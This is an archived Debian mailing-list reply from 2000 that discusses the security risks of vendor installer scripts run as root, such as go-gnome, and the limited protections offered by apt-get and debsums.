Re: Security

To: debian-user@lists.debian.org
Subject: Re: Security
From: kmself@ix.netcom.com
Date: Tue, 7 Nov 2000 22:59:36 -0800
Message-id: <[🔎] 20001107225936.I30920@ix.netcom.com>
In-reply-to: <[🔎] 20001108050632.2677.qmail@web208.mail.yahoo.com>; from vijay_248@yahoo.com on Tue, Nov 07, 2000 at 09:06:32PM -0800
References: <[🔎] 20001108050632.2677.qmail@web208.mail.yahoo.com>

on Tue, Nov 07, 2000 at 09:06:32PM -0800, Vijay Prabakaran (vijay_248@yahoo.com) wrote:
> Hi,
> 
>         I have been following the "horrifying suggestion" thread on
> the lists and what you say about the go-gnome script makes perfectly
> good sense. Has anyone talked to Helixcode about the problem? 

I copied Ethan's comments to the site and several specific contacts
there, some time last week.  No response.

> In most distributions all the script does is download the installer
> and in Debian it just adds an extra line in sources file. Telling the
> user to edit sources file and add the extra line and then doing and
> apt-get seems to me to be as simple as what they are asking the user
> to do.  

apt-get does provide some (largely weak) protections -- you are assuming
the site is trusted.  debsums also helps you, though only if they're
accurate in the first place.  Debian packages aren't, AFAIK, signed,
though package maintainers should keep their signatures current (I don't
quite understand what this accomplishes, and would appreciate an
explanation).

> There is no percentage in using the go-gnome script at all
> apart from giving misconceptions to the user about user friendliness.
> And now there are so many sites giving installation scripts to be
> executed as root user. Eazel makes you download an installer script
> for rpm based systems for installing nautilus PR2 and there are many
> more companies like that. Can anything be done to somehow make these
> people understand and use some security measures in the process of
> installing software.

The lone advantage here is that if there are problems with the script,
as it comes from a single, known, source, it can be checked, and
reported, if there are any problems.

There's an aptness to the use of a penguin as the GNU/Linux mascot,
regarding how penguins enter the water.  They crowd the edge of a floe
and jostle.  First bird in the water gets to find out if there's a
leopard seal (mortal enemy) below.  Alls-well?  The flock goes in. 

If there are blatantly apparent problems with someone's
root-access-required script, you can prety much bet you'll hear about
it.  In short order.  The problem is the non-blatant problems.  I much
prefer things to blow up in my face rather than smolder quietly for days
or weeks -- it's easier to figure out something's going wrong, and
likely, what caused it.

-- 
Karsten M. Self <kmself@ix.netcom.com>     http://www.netcom.com/~kmself
 Evangelist, Zelerate, Inc.                      http://www.zelerate.org
  What part of "Gestalt" don't you understand?      There is no K5 cabal
   http://gestalt-system.sourceforge.net/        http://www.kuro5hin.org

Attachment: pgpbMOGlcw_C7.pgp
Description: PGP signature

Reply to:

References:
- Security
  - From: Vijay Prabakaran <vijay_248@yahoo.com>

Prev by Date: Quick way to tell if online for use in cron script?
Next by Date: Re: Quick way to tell if online for use in cron script?
Previous by thread: Security
Next by thread: Security
Index(es):
- Date
- Thread